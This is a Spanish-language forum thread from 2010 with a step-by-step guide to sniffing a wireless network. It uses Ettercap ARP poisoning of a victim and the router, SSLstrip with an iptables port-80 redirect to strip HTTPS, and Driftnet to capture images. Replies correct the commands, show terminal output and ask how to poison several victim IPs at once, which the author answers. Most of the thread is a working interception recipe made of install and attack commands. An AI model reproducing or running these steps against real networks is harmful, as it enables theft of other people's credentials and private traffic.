HOW TO: Sniffing en Linux (Ettercap+SSLstrip+Driftnet)

mrfloffy · 6 Enero 2010, 23:35 PM

^{HOW TO: SNIFFING EN LINUX (ETTERCAP+SSLSTRIP+DRIFTNET)}

INTRODUCIÓN

Con este manual se pretende mostrar el funcionamiento de tres herramientas básicas de sniffing en el entorno linux.

- Ettercap:es un interceptor/sniffer/registrador para LANs con switch. Descargar Aquí (NG-0.7.3)

- SSLStrip:una herramienta que automatiza el ataque sobre la conexión SSL. Descargar Aquí (0.7)

- Driftnet:programa que escucha el tráfico de red y elige imágenes de flujos TCP que observa.Descargar Aquí (0.1.6)

INSTALACIÓN DE HERRAMIENTAS

ETTERCAP

Modo 1 (Recomendado):

Código [Seleccionar]


wget http://downloads.sourceforge.net/project/ettercap/ettercap/NG-0.7.3/ettercap-NG-0.7.3.tar.gz?use_mirror=heanet
tar zxvf ettercap-NG-0.7.3.tar.gz
cd ettercap-NG-0.7.3/
./configure
make clean
make
make install

Modo 2:

Código [Seleccionar]


sudo apt-get install ettercap

SSLSTRIP

Modo 1 (Recomendado):

Código [Seleccionar]


wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
tar zxvf sslstrip-0.7.tar.gz
cp -R sslstrip-0.7 /usr/bin/

DRIFTNET

Modo 1 (NO Recomendado):

Código [Seleccionar]


wget http://www.ex-parrot.com/~chris/driftnet/driftnet-0.1.6.tar.gz
tar zxvf driftnet-0.1.6.tar.gz
cd driftnet-0.1.6
make
make install

Modo 2 (Recomendado):

Código [Seleccionar]


apt-get install driftnet

EMPEZAMOS A USAR LAS HERRAMIENTAS

Bueno en este manual vamos hacer un supuesto de sniffing en una red inalámbrica (En este caso la mia xD)

Empecemos....

Parte 1 [Uso de Ettercap]

Uso General (Análisis de Tráfico)

Código [Seleccionar]


1.Vamos a una shell 
2. Ejecutamos el Ettercap : sudo ettercap -C
3.Sniff/Unified sniffing...(Imagen 1.1)
4.Escribimos el nombre de la interfaz en este caso wlan0 (para saber cual es iwconfig) i enter
5.Hosts/Scan for Hosts (Algunas veces se corta, volver a intentarlo y ya está)
6.Hosts/Host List
7.Seleccionamos el ip que nos interesa y pulsamos 1 y luego seleccionamos el router y pulsamos 2.
(El ip del router es normalmente 192.168.1.1 o 192.168.2.1)
8.Mitm/Arp Poisoning i escribimos "remote"(sin las ")
9.Start/Start Sniffing
10.View/View Connections
11.En este momento estaremos analizando el trafico de la red y en una ip concreta para analizar mas a fondo cada conexión solo hemos de pulsar enter encima, recordar que ahora el análisis no muestra contenido SSL.

Uso de Filtros

"PROXIMAMENTE"

Parte 2 [Uso de SSLSTRIP]

Código [Seleccionar]


1.Accedemos a la carpeta del ssl strip, en nuestro caso (cd /usr/bin/sslstrip-0.7)
2.En la consola su y después echo "1" > /proc/sys/net/ipv4/ip_forward (Activar redirección de paquetes)
3.Después escribimos iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 44444 (Redireccionamos todo el tráfico del puerto 80 al puerto XXXX(44444)
4.Escribimos ls y luego CAT sslstrip.py (Gracias mokoMonster)
5.Esccribimos SUDO python sslstrip.py -l 44444 y ya estamos "capturando " contenido SSL

Parte 3 [Uso de Driftnet]

Código [Seleccionar]


1.Escribimos en la consola sudo driftnet -i wlan0 (Donde wlan0 el nombre de la interfraz)
2.Para guardar una imagen pulsar encima

Próximamente actualizare el tema para que quede más detallado y añadiré algunas fotografías, para dudas o proposiciones (indebidas no gracias xD!) estaré encantado de recibirlas i también esperare actualizaciones

P.D=Arreglado lo del puerto xD

kamsky · 6 Enero 2010, 23:42 PM

Buen aporte gracias

p.d.: pon el título en minúscula (menos lo How To) y deja algún salto de linea para no tener que hacer scroll lateral

toxeek · 7 Enero 2010, 06:24 AM

Que tal.

Esperamos mas aportes mrfloffy

Saludos.

rockernault · 7 Enero 2010, 13:18 PM

me interesa sobre todo lo de SSL Strip, que no le he podido hacer funcionar... y que aun sigo atorado porque me han quitado mi computadora....

saludos y gracias por el aporte, se ve interesante...

chatarrero · 7 Enero 2010, 14:29 PM

Muy buen tutorial, probare el drifnet que el ettercap y sslstrip ya los tengo funcionando.

Saludos

jorgebr · 8 Enero 2010, 18:05 PM

Muy bueno el manual, tengo que probar ese Driftnet aver como va.

Por cierto, creo que hay un fallo en la orden de redirigir el puerto 80 al 44444, deberian redirigirse al puerto 10000 (que es el puerto de escucha por defecto de sslstrip), o indicarle a sslstrip que escuche en el 44444.

saludos!

Edito: una pregunta. ¿Se podría en ettercap indicar más de una ip victima a la vez, por ejemplo 5 ip's, y hacerlo de manera "multiple"?¿sería viable?.
Ya que no dispongo de 3 pc's para probarlo me gustaria saberlo.

mordisquitos1980 · 9 Enero 2010, 00:00 AM

saludos foro,,ettercap en wifiway no me deja ir mas alla de la consola,,tipeo ettercap -C y al pinchar sniff me vuelve a la consola anterior y aparece:

Ooops ! This shouldn't happen...
Segmentation Fault...

Please recompile in debug mode, reproduce the bug and send a bugreport

no esta soportado por el tan querido wifiway??

mokoMonster · 9 Enero 2010, 00:19 AM

Hay un error en:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 44444
debe hacerse como root y para iptables seria "iptables --t"

Código [Seleccionar]

sudo iptables --t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 44444

Modifico: Hay tambien otro error en la ultima linea del Paso 2:

Código [Seleccionar]

bsdkiller@bsdkiller:/usr/bin/sslstrip-0.7$ sudo python sslstrip -l 10000
/usr/bin/python: can't find '__main__.py' in 'sslstrip'

SOLUCION: Solamente es necesario hacer un "ls" dentro de la carpeta de SSLstrip (Gracias, Braulio) y despues un "CAT sslstrip.py" para que se lea el archivo y despues volver a ejecutar "sudo python sslstrip -l 10000"

Código [Seleccionar]

bsdkiller@bsdkiller:/usr/bin/sslstrip-0.7$ sudo python sslstrip.py -l 10000

sslstrip 0.6 by Moxie Marlinspike running...

Y hay otro error con Driftnet:

Código [Seleccionar]

bsdkiller@bsdkiller:~$ sudo driftnet -i eth1
[sudo] password for bsdkiller: 
libpng error: Invalid image width (skipping image).
driftnet: driftnet-4b47c2f274b0dc51.png: bogus image (err = 4)
libpng error: Invalid image width (skipping image).
driftnet: driftnet-4b47c2f2238e1f29.png: bogus image (err = 4)
libpng error: Invalid image width (skipping image).
driftnet: driftnet-4b47c304519b500d.png: bogus image (err = 4)
libpng error: Invalid image width (skipping image).
driftnet: driftnet-4b47c30a257130a3.png: bogus image (err = 4)

Cita de: jorgebr en 8 Enero 2010, 18:05 PM
Por cierto, creo que hay un fallo en la orden de redirigir el puerto 80 al 44444, deberian redirigirse al puerto 10000 (que es el puerto de escucha por defecto de sslstrip), o indicarle a sslstrip que escuche en el 44444.
Edito: una pregunta. ¿Se podría en ettercap indicar más de una ip victima a la vez, por ejemplo 5 ip's, y hacerlo de manera "multiple"?¿sería viable?.
Ya que no dispongo de 3 pc's para probarlo me gustaria saberlo.

Me gustaria que el autor diera mas informacion acerca de la cita que hago de jorgebr.

Y jorgebr, yo tengo mas de 5

Asi que lo puedo probar por tu, que dices? nos unimos ?

jorgebr · 9 Enero 2010, 14:26 PM

Cita de: mokoMonster en 9 Enero 2010, 00:19 AM
Me gustaria que el autor diera mas informacion acerca de la cita que hago de jorgebr.

Y jorgebr, yo tengo mas de 5 Asi que lo puedo probar por tu, que dices? nos unimos ?

Hola mokoMonster!, pues sí, me uno a que nos aclaren si es posible hacer eso que digo, y de serlo estaría bien que lo probaras, tengo curiosidad. Yo supongo que sí se podrá hacer.

Saludos

mrfloffy · 9 Enero 2010, 14:29 PM

Cita de: jorgebr en 8 Enero 2010, 18:05 PM
Edito: una pregunta. ¿Se podría en ettercap indicar más de una ip victima a la vez, por ejemplo 5 ip's, y hacerlo de manera "multiple"?¿sería viable?.
Ya que no dispongo de 3 pc's para probarlo me gustaria saberlo.

Para sniffear mas de un host simplemente hay que omitir el paso 7 "No hace falta seleccionar el ip en host list"